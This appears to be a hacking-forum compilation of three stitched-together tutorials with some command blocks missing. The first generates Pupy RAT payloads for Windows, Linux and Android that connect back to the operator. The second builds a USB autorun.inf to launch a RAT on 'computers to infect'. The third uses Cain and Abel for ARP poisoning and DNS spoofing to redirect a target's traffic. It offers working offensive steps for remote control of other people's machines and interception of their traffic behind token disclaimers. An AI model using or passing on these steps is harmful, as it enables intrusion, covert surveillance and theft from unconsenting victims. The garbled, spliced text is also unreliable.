[Tutorial] How to Setup Pupy RAT for Windows, Linux and Android - Opensource RAT

What is Pupy?Pupy is an opensource, multi-platform (Windows, Linux, OSX, Android), multi function RAT (Remote Administration Tool) and post-exploitation tool mainly written in python. 
It features a all-in-memory execution guideline and leaves very low footprint. Pupy can communicate using various transports, migrate into processes (reflective injection), load remote python code, python packages and python C-extensions from memory.

In this tutorial, I'll be showing you how to setup Pupy and generate payloads for Windows, Linux and Android.

This guide is meant for educational purposes only, accessing other people's computers without appropriate permissions is illegal and I don't condone it in any way.

Getting Started...
To get started, head over to the official Pupy GitHub repo and download the entire project as a zip file.



Extract the contents of the archive and read the text file titled 'Requirements.txt' inside the folder.
This text file contains the list of packages required for setting up Pupy - make sure you install all of them.

Generating The Payload
Once you're done installing all the packages, we're ready to generate our payload.

For this, open a terminal window in the directory which contains the 'pupygen.py' file and type:

You should now be able to see the proper usage/parameters to be used while generating the payload.


Now open a different terminal and type in the following command to find your IP address:

ifconfig

The highlighted IP address is the one to which you want your target machines to connect. 
Note it down and close the terminal.

Here are the commands for generating payloads for Windows, Linux and Android respectively.


Windows:

./pupygen.py -f exe_x86 -o <FileName>.exe connect --host <IP:Port>

Replace IP:Port with the IP address that we obtained in the above step and any valid port number that is not currently in use.
For targeting 64bit machines, change exe_x86 to exe_x64.

Linux:

./pupygen.py -f py -o <FileName>.py connect --host <IP:Port>

Android:

./pupygen.py -f apk -o <FileName>.apk connect --host <IP:Port>

If everything went well, it should say "payload successfully generated" and the payload should be visible in the same folder.

Remote Administration
To begin remote administration once the payload has been deployed, open another terminal in the same folder and type in:

That will open up the Pupy shell. If it says "Server started on port <PORTNUMBER> with transport ssl", it means your port number was valid and not in use and you're all set to accept the connecting from the target machine.
Input a question mark (?) to get the list of all the available commands.


To see all the available modules, type in:

To use a particular module, follow the format:

run <MODULE NAME>

If a module requires additional parameters, that will be specified.

Once you're done remotely administrating the machine, use the following command to disconnect all the clients:

Conclusion
This works over LAN. If you wish to do this over the internet, find your public IP address online and make sure that the port you select is appropriately forwarded.

A simple Windows 32bit payload generated by Pupy is around 6MB in size (pretty big) and it is in no way perfect. But it is free and opensource! 
Keep that in mind while using Pupy.

What you need:
• A USB that you don't care about
• Your RAT, bot, etc
• Computers to infect

1.
First your going to wanna plug in your USB, then click start and press computer. Go over to you USB and right click and press format after that press restore device defaults. This pretty much just clears everything off your USB to make it run faster.


2.
Now that you have reformatted your USB, go to notepad and put this:

Here's what these commands do :
'open=' opens a specific file you want in your flash drive, Put Your Virus Name .exe
'action=' is what will be displayed on the autorun menu, you can name it anything really.
'label=' it will rename your flash drive to whatever is after the =
'icon=' will change the icon of the flash drive u can use a .exe icon or a .ico icon

Example of what I use:

You can get any .ico off the internet and use that.

Now click file, save as and save it as autorun.inf

You can close out of all that now. From here just put the your icon, your application, and the autorun.inf file on your USB.

Now just plug your USB into any computer you see and the press enter, you have to press enter to select and run your server.

Wikipedia defines "DNS spoofing" as the following:
"DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain Name System (DNS) resolver's cache, causing the name server to return an incorrect IP address, diverting traffic to the attacker's computer (or any other computer)."

To put it short, by the end of this tutorial you will be able to manipulate web requests on your OWN wireless network. For example: if your targeted computer tries to reachhttp://www.facebook.com, you can manipulate the web request to redirect the targeted computer to send a web request to a web server hosted on your computer, stating that facebook.com is blocked on your Wi-Fi, or redirect someone to your own version of http://www.facebook.com which has a much cooler GUI than the original.

Info: Cain and Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Directions:
Upon navigating to the link, you will find a webpage that looks something like this:



You want to select the option that reads: "Download Cain & Abel v4.9.56 for Windows NT/2000/XP".

When the file has completed downloading, you want to take the following measures to ensure Cain and Abel is ready for use:
1. Disable the windows firewall
2. Always run Cain and Abel as administrator (you may want to enable this in the property section of the application.)
3. Make sure you are connected to the desired wireless network (DO NOT USE THIS ON ANY NETWORK BUT YOUR OWN)

Step 1: Start up Cain and Abel
(Make sure Cain is running with administrative privileges and the Windows firewall is disabled)


Step 2: Navigate to the "Sniffer" tab, enable the "sniffer", and start a scan on your network (using the plus icon and pressing start scan) (this will locate the IP addresses of all devices on your network, as well as the mac address and OUI footprints).


Step 3.
Once you find all the IP address listed, its now your job to locate which IP address is your router, and which one is your targeted computer.

For example:
My router's IP address is: 192.168.1.1
While my targeted computer's IP address is: 192.168.1.7

Step 4.
Now its time to begin ARP on your selected computer and redirect traffic!

Firstly, select the ARP tab on the lower tab set.


Second, you want to click inside of the upper tab set on the ARP tab.


Step 5.
This will enable the plus button on the options menu above. After this is enabled, you want to click the plus button.
Upon doing this, you will be prompted by a selection module. which will ask you to select two IP addresses. If you were paying attention up to now, that is where those two previous IP addresses you wrote down come into use.
In the first selection box, you want to select your routers IP address. In my case, its 192.168.1.1
Yours may be different.

After clicking your routers IP address, the next selection module will load a series of results. The results are all the other IP addresses associated with your router. This is where you will select one or more of the IP addresses as the targeted computer. The targeted computer can be any OS; including phones, tablets, Linux, OSX, Windows, or any other which has the ability to communicate with the internet.



Step 6. Click the ARP button to activate the ARP poisoning.


Step 7.
Once poisoning is activated, navigate to the tab on the left titled, "ARP-DNS".


Step 8. Add your entry.

Begin by right clicking on the ARP-DNS form. This should prompt you with a selection menu. The options include: "Add to List", "Edit", "Remove from List", "Remove All". You want to select "Add to List".

A form should prompt you to enter in the desired information.

For mine, I entered in facebook.com, and my IPv4 for the address to redirect packets to.

Step 9.
Have the targeted computer try to access the "DNS Name Request" you entered in ARP-DNS. For me, it was http://www.facebook.com

If you did it right, the connection will time out, since there is no server to be accessed on your IP address (or maybe there is, its none of my concern).

If you wanted the targeted computer to be redirected to a different website, like google, or yahoo answers or some shit, you would simply resolve the IP address of that website and enter it into the box in ARP-DNS. This will work, assuming that the website allows direct IP address access, which most web hosts don't allow.

If you wanted the targeted computer to redirect to a web server hosted on your computer, you would simply set up an Apache webserver, and create a small simple website, hosted on your computer. The webpage they would be redirected to could be anything you would like, but nothing illegal

3.Maintain a Separate DNS server for public services and for internal services.
